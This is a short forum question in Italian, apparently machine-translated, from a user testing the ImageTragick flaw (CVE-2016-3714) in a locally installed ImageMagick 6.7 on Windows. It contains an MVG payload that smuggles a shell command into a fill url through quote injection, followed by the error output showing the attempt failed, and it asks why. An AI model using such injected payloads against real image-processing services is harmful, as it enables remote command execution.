Ho installato una versione vulnerabile dell'immagine magick i.e. 6.7 e in base a questo CVE-2016-3714 è una versione vulnerabile. Ora, perché l'ho scaricato perché ho un'idea chiara di questa vulnerabilità.
Problema.
Di seguito è riportato il mio codice file per test.png
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/oops.jpg" && mkdir" /hacked )'
pop graphic-context
poiché sono un utente di Windows 10.
Ora, quando lo eseguo attraverso il terminale come questo convert test.png test2.jpg ciò che ho visto nell'errore è
convert.exe: unrecognized color 'https://127.0.0.1/oops.jpg" && mkdir" /hacked ' @ warning/color.c/GetColorCompliance/947.
convert.exe: no decode delegate for this image format '//127.0.0.1/oops.jpg" && mkdir" /hacked ' @ error/constitute.c/ReadImage/532.
convert.exe: Non-conforming drawing primitive definition 'fill' @ error/draw.c/DrawImage/3146.
Ora non ho alcuna idea sul problema, tutto quello che so è che ho sicuramente una versione vulnerabile ma non posso sfruttarla.
Apprezzerà qualsiasi risposta.
Grazie